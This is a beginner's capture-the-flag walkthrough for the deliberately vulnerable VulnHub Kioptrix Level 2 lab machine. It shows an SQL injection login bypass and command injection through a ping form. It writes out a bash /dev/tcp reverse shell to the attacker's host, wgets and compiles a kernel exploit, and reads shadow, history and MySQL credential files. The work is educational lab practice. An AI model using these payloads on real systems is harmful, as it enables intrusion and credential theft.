VulnHub — Kioptrix Level 2
Hello friends, it’s my Write-up about how to hack Kioptrix machine and get root access (Boot To Root).
At the first and before we beginning I want to say that the Kioptrix machines is considered the easiest machines from VulnHub, this machines is for Beginners, I’m still beginner also :”) So if you don’t know how to solve or deal with Level 1, take a look at this Writeup from me also in an easy way https://medium.com/@eslam3kl/vulnhub-kioptrix-level-1-345000a7e7a9
So after downloading the machine and setup it at VMWare or VirtualBox lets get started…
In this walkthrough we’ll deal with multiple type of vulnerabilities like LFI, SQLi, Privilege escalation, etc
But at the first I want to put my methodology to start with any machine:
0. Recon. or Information gathering (IP’s, MAC addresses, information disclosure, server version, open ports, etc)
- Enumeration like SMB, HTTPS, HTTP, etc
This step to know more information about the machine like its IP, MAC, Server type, Open ports, System version, etc
At the first you should know the IP address of your machine and you can get it by using ifconfig command in your terminal
Next I want to know the IP address of the machine so I'll use my own tool NetScanner which written in python 2 and you can download it from here https://github.com/eslam3kl/NetScanner
Or you can use the built-in tool with Kali netdiscover but I always use my tool because it return the results in less time than netdiscover
NetScanner → python network_scanner.py -i ip_address_range
Netdiscover → netdiscover -r ip_address_range
Now we know that the IP address of the machine is 10.0.2.23 because of the first 3 IPs is related to the Kali system itself, the difference IP here is the last one, yeah it’s related to our target.
Before go to perform HTTP Enumeration i want to go to Nmap first because it will take a long time so we’ll run it and go to do another scan until it finish. The scan results we’ll analyse it to get any port which may be vulnerable.
You’ll notice that ssh, http, rpcbind, ipp, ssl, https and mysql is open so for me I'll concern more about http, ssh and mysql to start with them. Also you’ll notice that the Linux version is 2.6.x and the Linux_kernel is 2.6.
#1 Enumeration (HTTP)
Go to the browser and search for the IP address of the machine which in my case 10.0.2.23 (It may be different in your network)
You’ll find a login panel which require username and password and in this case I think about SQLi to break authentication by inserting this payload in the username text area (admin ‘ #)
Let’s see what will happen …
Nice ! It’s worked. So the first thing in this machine is it’s vulnerable by SQL injection in the login page
You’ll notice that it ask you to ping a machine in your network so I'll try to ping the localhost of the machine itself
Nice! It’s worked and already bing to itself, so it may be vulnerable to LFI vulnerability and from it i can read an important files like /etc/passwd or /etc/shadow or anything else
let’s try this by inserting whoami command line to see if I'm a user or a root but to insert multiple commands in the same input you should have to insert ; between them like this( localhost ; whoami )
Now we know that until this moment we just a user not a root so we’ll try to perform OS Command Execution if the machine is vulnerable to it by inserting this input (localhost ; bash -i >& /dev/tcp/10.0.2.15/443 0>& 1) and by using nc we’ll listen to this port for any incoming connection by inserting (nc -lvp 443)
Very Very Nice, it’s vulnerable to OS command injection, note that we now in the terminal of the machine and because it a Linux OS so we’ll use the same Kali command we actually know. If you see the terminal again you will notice this character $ which say we’re still normal user so I'll use this normal user privileges to collect more info about the machine which Nmap and Nikto don’t get back to me.
For Example I'll use this command cat /etc/*elease to know the version of the CentOS (related to http port “Open”)
So the CentOS release is 4.5, good for now. Let’s collect more information about the Linux kernel itself by inserting this command uname -a
The Linux kernel version is 2.6.9–50.
Now we’ll take this information to search about script to exploit the machine from the open ports, we’ll search by using searchsploit tool
Depending on the Linux kernel and the CentOS version we’ll use the script 9545.c, now we’ll try to share this script with the machine and execute it on it, in this way we’ll get the root access.
Start the http sharing server which open in the port 80
To share this script to the machine first copy the script from it’s directory to Kali’s root directory and then go to the machine and change directory to /tmp so you can read and write (have a permission). After change the directory, get the script by wget by this command wget http://10.0.2.15/9545.c
The next step is to execute the script into the machine like this gcc -o start 9545.c
Bingo ! You’re now have the root privileges
After we have a root access from exploit C script from local machine, we can also get the admins credentials from searching about this data so let’s continue …
Before you get the root access you can’t open /etc/passwd or /etc/shadow to get the username and the password of the users on the system but now you can open it by change directory to /etc and read these files
/etc/shadow and /etc/passwd these files are containing sensitive data about the usernames of the users and there passwords
Note at the end of this file these passwords …
But unfortunaltely this passwords are hashed so you can’t get the original password easily so let’s search about anything else manage us to get these data… but how do you think about SQL ? This machine have a localhost which host the Web Application so do you think it have a database ? Sure ! let’s search about it..
Go to the root and list the directories including the hidden also
Note this hidden file .bash_history which record any command which written in the bash, open it to see its content
Great ! the root had written this command in this machine ( cat .mysql_history ) so let’s go to root directory and search about it there
Great ! we’ve find it :”) Open it to have amazing credentials, Trust ME 😇
See ! Now we’ve a great info from the database ^-^
we’ve database named webapp and tables like users and columns like user and password and it’s values like user=john and password=hiroshima and the user=admin and it’s weird password :)
This data in related to webapp database and this web application is in the localhost on the machine at its directory /var/www/html/
You’ll find 2 files index.php and pinfgit.php, the second one doesn’t have important information as you can so let’s open the first one
Great! As you can see amazing credentials again about the webapp database.
Until now we have a great information and credentials about the database and the user, let’s dump more data by using SQLmap or by manual, I’ll work manually ..
Username=john , Password=hiroshima
this command you can use it to dump all the database by this sequence database → table name → columns → data
At the last screenshot we have the databases so in each one you will dump it to get any other sensitive data
and in the next dump you will type mysql -u john -p — execute=”select * from mysql.user”
user is the table name
mysql is the database name
- u → username
-p → password
Congratulation for the root access Bro ❤